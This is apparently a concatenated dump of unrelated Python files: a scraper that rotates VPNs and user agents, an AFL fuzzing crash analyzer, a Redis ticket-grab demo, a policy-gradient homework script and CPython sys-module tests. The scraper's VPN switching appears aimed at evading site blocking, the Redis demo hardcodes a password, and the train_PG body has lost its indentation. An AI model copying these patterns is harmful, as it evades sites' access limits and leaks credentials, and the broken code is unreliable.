                f = HTMLFilter()
                f.feed(raw_source)
                print(f.text)
                processed = f.text
                print("Worker",id,"RECV",len(raw_source))
                return processed
            except KeyboardInterrupt:
                exit()
            except Exception as e:
                count +=1
                if count>3:
                    return -1,-1
                print("WOKR:",id,'ERR',str(e))
                # Best-effort cleanup: the driver may not exist yet.
                try:
                    driver.quit()
                    del driver
                except:
                    pass
                time.sleep(reset_time)
                continue

    def worker(self,id_job,wid,output):
        """Thread body: process the ID list ``id_job`` and append results.

        NOTE(review): the ``assert 0 == 1`` below is a deliberate tripwire —
        result post-processing is unimplemented, so the worker aborts after
        the first search. Replace it with real processing before use.
        """
        print(f"{wid} worker booted")
        for i in range(len(id_job)):
            uname = id_job[i]
            result = self.search(uname,wid)
            print("YOU MAY WANT TO PROCESS RESULT HERE")
            assert 0 == 1
            des = open(self.output_file,"a")
            des.write("{}\n".format(result))
            des.close()
            print("Worker",wid,"Job", i,'/',len(id_job))
        print(f"{wid} worker ended")

    def start(self):
        """Load the todo list, subtract finished IDs, and launch the workers."""
        allid = []   # every ID from the input file
        todo = []    # IDs not yet present in the output file
        done = []    # IDs already written to the output file
        prefix = []  # unused; kept as-is
        print("Loading file")
        csvfile = open(self.input_file,'r')
        lines = csvfile.readlines()
        for line in lines:
            try:
                allid.append(line.strip())
            except:
                pass
        print("Data loaded,", len(allid),"found")
        csvfile.close()
        # Ensure the output file exists before reading it back.
        try:
            csvfile = open(self.output_file)
        except:
            csvfile = open(self.output_file,'w')
            csvfile.close()
            csvfile = open(self.output_file)
        lines = csvfile.readlines()
        for line in lines:
            try:
                # Second CSV column of each output row is the finished ID.
                row = line.split(",")
                done.append(row[1].strip())
            except:
                pass
        print("Data loaded,", len(done),"done")
        csvfile.close()
        print("Load task todo")
        for i in tqdm.tqdm(range(len(allid))):
            if allid[i] in done:
                done.remove(allid[i])
            else:
                todo.append(allid[i])
        print(len(todo),'job todo')
        # Round-robin the remaining IDs across the worker threads.
        todo_jobs = []
        for i in range(self.worker_count):
            todo_jobs.append([])
        for i in range(len(todo)):
            j = i%self.worker_count
            todo_jobs[j].append(todo[i])
        # Background VPN switching for the whole run.
        threading.Thread(target=vpnsel, args=(self.vpn,self.reset)).start()
        for i in range(self.worker_count):
            print(i,"worker booting")
            threading.Thread(target=self.worker, args=(todo_jobs[i], i, self.output_file)).start()
            time.sleep(0.1)  # stagger browser start-up
if __name__ == '__main__':
    # Build the scraper from a JSON config file and start the worker threads.
    parser = argparse.ArgumentParser(description='Some tool to query website, automatically switch vpn')
    parser.add_argument('--config', metavar='config_file', type=str, required=True,
                        help='path to configure file.')
    args = parser.parse_args()
    with open(args.config, 'r') as f:
        config = json.loads(f.read())
    # Expected config keys: url, worker_count, user_agents, input_file,
    # output_file, vpn_service, vpn_refresh.
    obj = OBJ(config['url'],config['worker_count'],config['user_agents'],config['input_file'],
              config['output_file'],config['vpn_service'],config['vpn_refresh'])
    obj.start()
|
analyze_manager.py | #!/usr/bin/env python3
"""
Call this script in order to analyze all founds crashes.
"""
import json
import pathlib
import celery
import os
parentdir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
os.sys.path.insert(0, parentdir)
import helpers.utils
from celery_tasks.tasks import analyze_package
class AnaylzeManager:
    """Schedules crash analysis of fuzzed packages through Celery.

    (The "Anaylze" typo in the name is kept for caller compatibility.)
    """

    def __init__(self, fuzzer_image: str, configurations_dir: str):
        # Docker image used by the analyze task, and the directory that
        # holds the per-package fuzz_data tree.
        self.fuzzer_image = fuzzer_image
        self.configuration_dir = configurations_dir

    def execute_tasks_through_celery(self):
        """Queue one analyze_package task per package that produced crashes.

        Scans ``fuzz_data/<package>/*.afl_config``, resolves each
        ``afl_out_dir`` to the local sync dir, and schedules analysis only
        when that dir reports ``unique_crashes > 0``. Blocks until all
        tasks finish and returns True iff every task reported success.
        """
        tasks = []
        for package_dir in os.listdir(os.path.join(self.configuration_dir, "fuzz_data")):
            if os.path.isdir(os.path.join(self.configuration_dir, "fuzz_data", package_dir)):
                import glob
                afl_multicore_conf_files = glob.glob(
                    os.path.join(self.configuration_dir, "fuzz_data", package_dir, "*.afl_config"))
                for cfile in afl_multicore_conf_files:
                    with open(cfile) as fp:
                        conf_dict = json.load(fp)
                    afl_out_dir = conf_dict.get("afl_out_dir")
                    if not afl_out_dir:
                        print("Analyzer: Skipping {0}, no afl_out_dir found!".format(cfile))
                        continue
                    # Drop the first two components of afl_out_dir (the
                    # container-side prefix) and re-root it under fuzz_data.
                    p = pathlib.Path(afl_out_dir)
                    out_dir = os.path.join(self.configuration_dir, "fuzz_data", str(pathlib.Path(*p.parts[2:])))
                    if int(helpers.utils.get_afl_stats_from_syncdir(out_dir).get("unique_crashes")) > 0:
                        print("Querying {0} for analyze!".format(out_dir))
                        tasks.append(
                            analyze_package.s(self.fuzzer_image, os.path.abspath(self.configuration_dir), package_dir))
                    else:
                        print("Analyzer: Skipping {0}, no crashes found!".format(out_dir))
        jobs = celery.group(tasks)
        results = jobs.apply_async()
        results.get()
        results.join()
        # NOTE(review): results.get() is invoked a second time here; each
        # .get() blocks on the result backend — consider caching the first
        # call's return value. Confirm no backend side effects.
        for res in results.get():
            if not res:
                return False
        return True
"""
Given a list of configurations, start the fuzzing.
The configurations should be in the following order:
Directory, file, ...
"""
# def print_output(chunk):
# print(chunk)
#
#
# q = queue.Queue()
#
# docker_client = docker.from_env()
#
#
# def worker(fuzzer_image, configurations_dir):
# """
# One thread - constantly gets binaries from the queue and works them.
# :return:
# """
# global q
# print("Worker spawned")
# while True:
# next_item = q.get()
# print("Next Item", next_item)
# if next_item is None:
# break
# package, afl_config_file = next_item # json_file is full path, package is just package name
# crashes_config = {}
# conf = {}
# with open(afl_config_file) as afl_config_filepointer:
# try:
# conf.update(json.load(afl_config_filepointer))
# except ValueError: # includes simplejson.decoder.JSONDecodeError
# print('Decoding JSON has failed {0}'.format(afl_config_file))
# continue
# if conf.get("binary_path") is None:
# print("No binary_path for", package)
# continue
# elif not conf.get("invocation_always_possible"):
# print("Invocation not possible", package)
# continue
# else:
# database_file_name = os.path.basename(conf["binary_path"]) + ".db"
# crashes_dir = os.path.basename(conf["binary_path"]) + "_crashes_dir"
# volumes_dict = {
# os.path.abspath(os.path.join(configurations_dir, "fuzz_data")): {"bind": "/results", "mode": "rw"},
# os.path.abspath(os.path.join(configurations_dir, "build_data")): {"bind": "/build", "mode": "rw"},
# }
# analyze_command_params = ["/inputinferer/configfinder/analyze_wrapper.py", "-p", package, "-v",
# "/results/"]
# analyze_command_params += ["-a", conf["afl_out_dir"], "-b", conf["binary_path"], "-v", "/results/",
# "-d", "/results/" + package + "/" + database_file_name, "-c",
# "/results/" + package + "/" + crashes_dir]
# container = docker_client.containers.run(image=fuzzer_image, remove=False, privileged=True,
# entrypoint="python",
# volumes=volumes_dict,
# command=analyze_command_params,
# detach=True, stream=True, stdout=True, stderr=True,
# name=package + "_anaylze_" + str(uuid.uuid4())[:4])
# container_output = ""
# for line in container.logs(stream=True):
# print(line.decode("utf-8").strip())
# container_output += line.decode("utf-8")
# status = container.wait()
# if status["StatusCode"] != 0:
# print(
# "Error while running docker command. Docker Output:\n {0}. Return value {1}".format(
# container_output,
# status[
# "StatusCode"]))
# else:
# crashes_config.update(conf)
# crashes_config["database_file_name"] = database_file_name
# crashes_config["crashes_dir"] = crashes_dir
# crashes_config["package_info"] = package + "_info.txt"
# crash_config_file = configurations_dir + "/" + package + "/" + os.path.basename(
# crashes_config["binary_path"]) + "_" + ".crash_config"
# print("Writing crash config file {0}".format(crash_config_file))
# with open(crash_config_file, "w") as crash_config_filepointer:
# json.dump(crashes_config, crash_config_filepointer)
# print("Task done")
# q.task_done()
#
#
# def worker_package(fuzzer_image, configurations_dir):
# """
# One thread - constantly gets packages from the queue and works them.
# :return:
# """
# global q
# print("Worker spawned")
# while True:
# next_item = q.get()
# print("Next item", next_item)
# if next_item is None:
# break
#
#
#
# def found_crash_for_package(self, package: str):
# contents = [os.path.join(dirpath, filename)
# for (dirpath, dirs, files) in os.walk(os.path.join(self.configuration_dir, package))
# for filename in (dirs + files)]
# for entity in contents:
# if "afl_fuzz" in entity and "crashes" in entity: # entity.endswith("crashes"):
# if len(os.listdir(entity)) > 0:
# return True
# return False
#
#
# def main(number_of_worker_threads: int, logfile: str, fuzzer_image: str, configuration_dir: str):
# global q
# number_of_worker_threads = 1
# afl_config_files = []
# for package_dir in os.listdir(configuration_dir):
# if os.path.isdir(configuration_dir + "/" + package_dir):
# for file in os.listdir(configuration_dir + "/" + package_dir):
# if file.endswith(".afl_config") and found_crash_for_package(configuration_dir):
# afl_config_files.append((package_dir, file))
# threads = []
# for i in range(number_of_worker_threads):
# t = threading.Thread(target=lambda: worker(fuzzer_image, configuration_dir))
# t.start()
# threads.append(t)
# for entity in afl_config_files:
# package = entity[0]
# afl_config_file = configuration_dir + "/" + package + "/" + entity[1]
# print("Putting", afl_config_file, "in queue")
# if not package:
# continue
# q.put((package, afl_config_file))
# q.join()
# for i in range(number_of_worker_threads):
# q.put(None)
# print("Waiting for thread")
# for t in threads:
# t.join()
#
#
# def main_package(number_of_worker_threads: int, logfile: str, fuzzer_image: str, configuration_dir: str):
# global q # type: queue.Queue()
# threads = []
# for i in range(number_of_worker_threads):
# t = threading.Thread(target=lambda: worker_package(fuzzer_image, configuration_dir))
# t.start()
# threads.append(t)
# for package_dir in os.listdir(os.path.join(configuration_dir, "fuzz_data")):
# if os.path.isdir(os.path.join(configuration_dir, "fuzz_data", package_dir)):
# import glob
# afl_multicore_conf_files = glob.glob(os.path.join(configuration_dir, "fuzz_data", package_dir,"*.conf"))
# for cfile in afl_multicore_conf_files:
# with open(cfile) as fp:
# conf_dict = json.load(fp)
# p = pathlib.Path(conf_dict["output"])
# out_dir = os.path.join(configuration_dir, "fuzz_data", str(pathlib.Path(*p.parts[2:])))
# if int(helpers.helpers.get_afl_stats_from_syncdir(out_dir).get("unique_crashes")) > 0:
# q.put(package_dir)
# break
# else:
# print("Package {0} has no crashes, skipping!".format(package_dir))
# if q.qsize() > 0:
# print("Waiting for queue")
# q.join()
# for i in range(number_of_worker_threads):
# q.put(None)
# print("Waiting for thread")
# for t in threads:
# t.join()
# print("Analyzing Done!")
#
#
# if __name__ == "__main__":
# parser = argparse.ArgumentParser(description='Start the building Process')
# parser.add_argument("-c", "--cores", required=False, type=int,
# help="The number of threads to spawn at max, usually how much cores your machine has. Default value for your computer " + str(
# len(os.sched_getaffinity(0))), default=len(os.sched_getaffinity(0)))
# parser.add_argument("-l", "--logfile", required=False, type=str,
# help="The path to the logfile this program should write to", default="log.log")
# parser.add_argument("-pd", "--plots_directory", required=False, type=str,
# help="The directory where the plot images shoud be saved.", default="figures/")
# parser.add_argument("-plot_format", "--plot_format", required=False, choices=["png", "tex"],
# help="In which format should the plots be saved", default="png")
# parser.add_argument("-t", "--timeout", required=False, type=float, help="The timeout for afl", default=1.5)
# parser.add_argument("-di", "--base_image", required=True, type=str, help="Time apt fuzzer image.")
# parser.add_argument("-cd", "--configuration_dir", required=True, type=str,
# help="The directory that contains the configurations")
# arguments = parser.parse_args()
# if not os.path.exists(arguments.configuration_dir) or not os.path.isdir(arguments.configuration_dir):
# raise NotADirectoryError("Configuration Path must be Directory!")
# main(number_of_worker_threads=arguments.cores, logfile=arguments.logfile, fuzzer_image=arguments.base_image,
# configuration_dir=arguments.configuration_dir)
|
grab_ticket.py | import redis
import threading
# Create a Redis connection pool shared by all seller threads.
pool = redis.ConnectionPool(host="localhost", port=6379, db=0, password='macintosh')
r = redis.StrictRedis(connection_pool = pool)
KEY = "ticket_count"  # Redis key holding the remaining ticket count
# Simulate user i trying to grab a ticket.
def sell(i):
    """Atomically decrement the ticket count on behalf of user ``i``.

    Uses Redis optimistic locking: WATCH the counter, read it, then
    MULTI/SET/EXEC. If another client modified the key between WATCH and
    EXEC, execute() raises and we retry; when the count is zero we give up.
    """
    # Initialise a pipeline for this thread.
    pipe = r.pipeline()
    while True:
        try:
            # Watch the ticket counter for concurrent modification.
            pipe.watch(KEY)
            # Read the current ticket count.
            c = int(pipe.get(KEY))
            if c > 0:
                # Start the transaction.
                pipe.multi()
                c = c-1
                pipe.set(KEY, c)
                pipe.execute()  # raises WatchError if KEY changed meanwhile
                print("用户 {} 抢票成功, 当前票数 {}".format(i, c))
                break
            else:
                print("用户 {} 抢票失败, 票卖完了".format(i))
                break
        except Exception as e:
            # EXEC failed (watched key changed) — loop and retry.
            print("用户{}抢票失败,重试一次".format(i))
            continue
        finally:
            pipe.unwatch()
if __name__ == '__main__':
    # Seed the counter with 5 tickets, then race 100 buyer threads.
    r.set(KEY, 5)
    for i in range(100):
        t = threading.Thread(target=sell, args=(i,))
        t.start()
|
train_pg.py | import numpy as np
import tensorflow as tf
import gym
import logz
import scipy.signal
import os
import time
import inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
def normalize(data, mean=0.0, std=1.0):
    """Shift and scale *data* toward the given mean and std.

    The input is first standardised (zero mean, unit std, with a 1e-8 guard
    against division by zero), then rescaled by ``std + 1e-8`` and shifted
    by ``mean``.
    """
    centered = data - np.mean(data)
    standardized = centered / (np.std(data) + 1e-8)
    return standardized * (std + 1e-8) + mean
def build_mlp(
        input_placeholder,
        output_size,
        scope,
        n_layers=2,
        size=64,
        activation=tf.tanh,
        output_activation=None,
        training=False
        ):
    """Build a feedforward MLP and return its pre-activation output logits.

    Args:
        input_placeholder: Input tensor of shape (batch, input_dim).
        output_size: Width of the final layer.
        scope: Variable scope name (reused across calls via AUTO_REUSE).
        n_layers: Total number of layers (n_layers-1 hidden + 1 output).
        size: Units per hidden layer.
        activation: Hidden-layer activation.
        output_activation: Unused — the raw logits are returned.
            NOTE(review): a softmax ('ybar') is built but discarded; confirm
            that callers intentionally consume logits only.
        training: Whether dropout is active (True during training).

    Returns:
        The logits tensor of shape (batch, output_size).
    """
    z = input_placeholder
    for i in range(1, n_layers + 1):
        with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
            if i != n_layers:
                with tf.variable_scope('mlp' + str(i), reuse=tf.AUTO_REUSE):
                    # Weight matrices are created implicitly by tf.layers.dense.
                    z = tf.layers.dense(z, units=size, activation=activation)
                    # BUG FIX: forward the `training` flag — tf.layers.dropout
                    # defaults to training=False, so without this argument
                    # dropout was never applied, even during training.
                    z = tf.layers.dropout(z, rate=0.25, training=training)
            else:
                with tf.variable_scope('mlp' + str(n_layers), reuse=tf.AUTO_REUSE):
                    logits = tf.layers.dense(z, units=output_size, name='logits')
                    y = tf.nn.softmax(logits, name='ybar')
    return logits
def pathlength(path):
    """Number of timesteps in a trajectory (length of its reward list)."""
    rewards = path["reward"]
    return len(rewards)
#============================================================================================#
# Policy Gradient
#============================================================================================#
def train_PG(exp_name='',
env_name='CartPole-v0',
n_iter=100,
gamma=1.0,
min_timesteps_per_batch=1000,
max_path_length=None,
learning_rate=5e-3,
reward_to_go=True,
animate=True,
logdir=None,
normalize_advantages=True,
nn_baseline=False,
seed=0,
# network arguments
n_layers=1,
size=32
):
start = time.time()
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
locals_ = locals()
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
# Make the gym environment
env = gym.make(env_name)
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
#========================================================================================#
# Notes on notation:
#
# Symbolic variables have the prefix sy_, to distinguish them from the numerical values
# that are computed later in the function
#
# Prefixes and suffixes:
# ob - observation
# ac - action
# _no - this tensor should have shape (batch size /n/, observation dim)
# _na - this tensor should have shape (batch size /n/, action dim)
# _n - this tensor should have shape (batch size /n/)
#
# Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
# is None
#========================================================================================#
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#print("hellooooooo",ac_dim,env.action_space.shape)
#========================================================================================#
# ----------SECTION 4----------
# Placeholders
#
# Need these for batch observations / actions / advantages in policy gradient loss function.
#========================================================================================#
sy_ob_no = tf.placeholder(shape=[None, ob_dim], name="ob", dtype=tf.float32)
if discrete:
sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.float32)
# Define a placeholder for advantages
sy_adv_n = tf.placeholder(dtype=tf.float32, shape=[None], name="adv")
#========================================================================================#
# ----------SECTION 4----------
# Networks
#
# Make symbolic operations for
# 1. Policy network outputs which describe the policy distribution.
# a. For the discrete case, just logits for each action.
#
# b. For the continuous case, the mean / log std of a Gaussian distribution over
# actions.
#
# Hint: use the 'build_mlp' function you defined in utilities.
#
# Note: these ops should be functions of the placeholder 'sy_ob_no'
#
# 2. Producing samples stochastically from the policy distribution.
# a. For the discrete case, an op that takes in logits and produces actions.
#
# Should have shape [None]
#
# b. For the continuous case, use the reparameterization trick:
# The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
#
# mu + sigma * z, z ~ N(0, I)
#
# This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
#
# Should have shape [None, ac_dim]
#
# Note: these ops should be functions of the policy network output ops.
#
# 3. Computing the log probability of a set of actions that were actually taken,
# according to the policy.
#
# Note: these ops should be functions of the placeholder 'sy_ac_na', and the
# policy network output ops.
#
#========================================================================================#
if discrete:
# YOUR_CODE_HERE
sy_logits_na = build_mlp(sy_ob_no,ac_dim,scope="build_nn",n_layers=n_layers,
size=size,
activation=tf.nn.relu)
sy_sampled_ac = tf.one_hot(tf.squeeze(tf.multinomial(sy_logits_na,1)),ac_dim) # Hint: Use the tf.multinomial op
sy_logprob_n = tf.nn.softmax_cross_entropy_with_logits_v2(labels=sy_ac_na, logits=sy_logits_na)
# Learned from https://github.com/InnerPeace-Wu/
# # Another way to do it
# N = tf.shape(sy_ob_no)[0]
# sy_prob_na = tf.nn.softmax(sy_logits_na)
# sy_logprob_n = tf.log(tf.gather_nd(sy_prob_na, tf.stack((tf.range(N), sy_ac_na), axis=1)))
else:
# YOUR_CODE_HERE
sy_mean = build_mlp(sy_ob_no,ac_dim,scope="build_nn",n_layers=n_layers,
size=size,
activation=tf.nn.relu)
sy_logstd = tf.Variable(tf.zeros(ac_dim), name='logstd',
dtype=tf.float32)
sy_std = tf.exp(sy_logstd)
sy_sampled_ac = sy_mean + tf.multiply(sy_std,tf.random_normal(tf.shape(sy_mean)))
sy_z = (sy_ac_na - sy_mean) / sy_std
sy_logprob_n = 0.5* tf.reduce_sum(tf.square(sy_z), axis=1)
#sy_logprob_n = 0.5*tf.reduce_sum(tf.squared_difference(tf.div(sy_mean,sy_std),
#tf.div(sy_ac_na,sy_std))) # Hint: Use the log probability under a multivariate gaussian.
#========================================================================================#
# ----------SECTION 4----------
# Loss Function and Training Operation
#========================================================================================#
#loss = tf.reduce_sum(tf.multiply(tf.nn.softmax_cross_entropy_with_logits_v2(labels=sy_ac_na,logits=sy_logits_na),sy_adv_n)) # Loss function that we'll differentiate to get the policy gradient.
loss = tf.reduce_sum(tf.multiply(sy_logprob_n,sy_adv_n))
update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss)
#========================================================================================#
# ----------SECTION 5----------
# Optional Baseline - Defining Second Graph
#========================================================================================#
if nn_baseline:
baseline_prediction = tf.squeeze(build_mlp(
sy_ob_no,
1,
"nn_baseline",
n_layers=n_layers,
size=size))
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
# YOUR_CODE_HERE
sy_rew_n = tf.placeholder(shape=[None], name="rew", dtype=tf.int32)
loss2 = tf.losses.mean_squared_error(labels=sy_rew_n,predictions=baseline_prediction)
baseline_update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss2)
#========================================================================================#
# Tensorflow Engineering: Config, Session, Variable initialization
#========================================================================================#
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
sess = tf.Session(config=tf_config)
sess.__enter__() # equivalent to `with sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
ob = env.reset()
obs, acs, rewards = [], [], []
animate_this_episode=(len(paths)==0 and (itr % 30 == 0) and animate)
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.05)
obs.append(ob)
one_hot_ac = sess.run(sy_sampled_ac, feed_dict={sy_ob_no : ob[None]})
if discrete:
ac=int(np.argmax(one_hot_ac))
else:
ac=one_hot_ac
#print("helloooo",ac)
acs.append(one_hot_ac)
ob, rew, done, _ = env.step(ac) #transition dynamics P(s_t+1/s_t,a_t), r(s_t+1/s_t,a_t)
rewards.append(rew)
steps += 1
if done or steps > max_path_length:
break
path = {"observation" : np.array(obs),
"reward" : np.array(rewards),
"action" : np.array(acs)}
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > min_timesteps_per_batch:
break
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
ac_na=ac_na.reshape([-1,ac_dim])
print("helloooo",ac_na.shape)
#====================================================================================#
# ----------..----------
# Computing Q-values
#
# Your code should construct numpy arrays for Q-values which will be used to compute
# advantages (which will in turn be fed to the placeholder you defined above).
#
# Recall that the expression for the policy gradient PG is
#
# PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
#
# where
#
# tau=(s_0, a_0, ...) is a trajectory,
# Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
# and b_t is a baseline which may depend on s_t.
#
# You will write code for two cases, controlled by the flag 'reward_to_go':
#
# Case 1: trajectory-based PG
#
# (reward_to_go = False)
#
# Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
# entire trajectory (regardless of which time step the Q-value should be for).
#
# For this case, the policy gradient estimator is
#
# E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
#
# where
#
# Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
#
# Thus, you should compute
#
# Q_t = Ret(tau)
#
# Case 2: reward-to-go PG
#
# (reward_to_go = True)
#
# Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
# from time step t. Thus, you should compute
#
# Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
#
#
# Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
# like the 'ob_no' and 'ac_na' above.
#
#====================================================================================#
# DYNAMIC PROGRAMMING
if reward_to_go:
q_n=list()
for path in paths:
pLen=pathlength(path)
q_p=np.zeros(pLen)
q_p[pLen-1]=path['reward'][pLen-1]
for t in reversed(range(pLen-1)):
q_p[t]=path['reward'][t]+gamma*q_p[t+1]
q_p=np.array(q_p)
q_n.append(q_p)
else:
q_n=list()
for path in paths:
pLen=pathlength(path)
q_p=0
for t in range(pLen):
q_p=q_p+(gamma**t)*(path['reward'][t])
q_n.append(q_p*np.ones(pLen))
q_n=np.concatenate(q_n)
#print(q_n.shape)
#====================================================================================#
# ----------SECTION 5----------
# Computing Baselines
#====================================================================================#
if nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current or previous batch of Q-values. (Goes with Hint
# #bl2 below.)
b_n = sess.run(baseline_prediction, feed_dict={sy_ob_no:ob_no})
b_n = normalize(b_n, np.mean(q_n), np.std(q_n))
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
#====================================================================================#
# ----------SECTION 4----------
# Advantage Normalization
#====================================================================================#
if normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
# YOUR_CODE_HERE
adv_n = normalize(adv_n)
#====================================================================================#
# ----------SECTION 5----------
# Optimizing Neural Network Baseline
#====================================================================================#
if nn_baseline:
# ----------SECTION 5----------
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 above.)
# YOUR_CODE_HERE
sess.run(baseline_update_op,feed_dict={sy_ob_no:ob_no,sy_rew_n:q_n})
#====================================================================================#
# ----------SECTION 4----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
sess.run(update_op,feed_dict={sy_ac_na:ac_na,sy_ob_no:ob_no,sy_adv_n:adv_n})
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
    """Parse command-line arguments and launch one policy-gradient run.

    BUG FIX: the original parsed --seed (and --n_experiments) but then
    hardcoded seed=0 and wrote logs under 'data/<exp>/0', silently
    ignoring the flag.  The parsed seed is now actually used for both
    the training run and the per-seed log subdirectory.
    """
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('env_name', type=str)
    parser.add_argument('--exp_name', type=str, default='vpg')
    parser.add_argument('--render', action='store_true')
    parser.add_argument('--discount', type=float, default=1.0)
    parser.add_argument('--n_iter', '-n', type=int, default=100)
    parser.add_argument('--batch_size', '-b', type=int, default=1000)
    parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
    parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
    parser.add_argument('--reward_to_go', '-rtg', action='store_true')
    parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
    parser.add_argument('--nn_baseline', '-bl', action='store_true')
    parser.add_argument('--seed', type=int, default=1)
    parser.add_argument('--n_experiments', '-e', type=int, default=1)  # NOTE: single-run script; flag currently unused
    parser.add_argument('--n_layers', '-l', type=int, default=1)
    parser.add_argument('--size', '-s', type=int, default=32)
    args = parser.parse_args()

    # One timestamped directory per invocation, under data/.
    logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
    logdir = os.path.join('data', logdir)
    os.makedirs(logdir, exist_ok=True)  # also creates 'data' if missing

    # --ep_len <= 0 means "use the environment's own episode limit".
    max_path_length = args.ep_len if args.ep_len > 0 else None

    train_PG(
        exp_name=args.exp_name,
        env_name=args.env_name,
        n_iter=args.n_iter,
        gamma=args.discount,
        min_timesteps_per_batch=args.batch_size,
        max_path_length=max_path_length,
        learning_rate=args.learning_rate,
        reward_to_go=args.reward_to_go,
        animate=args.render,
        logdir=os.path.join(logdir, '%d' % args.seed),
        seed=args.seed,
        normalize_advantages=not args.dont_normalize_advantages,
        nn_baseline=args.nn_baseline,
        n_layers=args.n_layers,
        size=args.size,
    )


if __name__ == "__main__":
    main()
|
test_sys.py | # -*- coding: iso-8859-1 -*-
import unittest, test.test_support
import sys, cStringIO, os
import struct
class SysModuleTest(unittest.TestCase):
def test_original_displayhook(self):
    # Verify the contract of the default sys.__displayhook__:
    # it needs exactly one argument, prints nothing for None, and for
    # other values prints repr() + newline and binds the value to
    # __builtin__._ .
    import __builtin__
    savestdout = sys.stdout
    out = cStringIO.StringIO()
    sys.stdout = out                      # capture what the hook prints
    dh = sys.__displayhook__
    self.assertRaises(TypeError, dh)      # zero arguments is an error
    if hasattr(__builtin__, "_"):
        del __builtin__._                 # start from a known state
    dh(None)                              # None: no output, no '_' binding
    self.assertEqual(out.getvalue(), "")
    self.assert_(not hasattr(__builtin__, "_"))
    dh(42)                                # non-None: printed and bound to _
    self.assertEqual(out.getvalue(), "42\n")
    self.assertEqual(__builtin__._, 42)
    del sys.stdout                        # with no stdout the hook must fail
    self.assertRaises(RuntimeError, dh, 42)
    sys.stdout = savestdout
def test_lost_displayhook(self):
    """Interactive evaluation without sys.displayhook raises RuntimeError.

    FIX: the original restored sys.displayhook only after the assertion,
    so a failure left the hook deleted and poisoned every later test in
    the process.  Restore it in a finally block instead.
    """
    olddisplayhook = sys.displayhook
    del sys.displayhook
    try:
        code = compile("42", "<string>", "single")
        self.assertRaises(RuntimeError, eval, code)
    finally:
        sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
    """A displayhook that raises propagates its exception out of eval().

    FIX: restore the saved hook in a finally block so an assertion
    failure cannot leave the broken hook installed for later tests.
    """
    olddisplayhook = sys.displayhook

    def baddisplayhook(obj):
        raise ValueError

    sys.displayhook = baddisplayhook
    try:
        code = compile("42", "<string>", "single")
        self.assertRaises(ValueError, eval, code)
    finally:
        sys.displayhook = olddisplayhook
def test_original_excepthook(self):
    # The default sys.__excepthook__ requires its (type, value, traceback)
    # arguments and writes the formatted traceback to sys.stderr.
    savestderr = sys.stderr
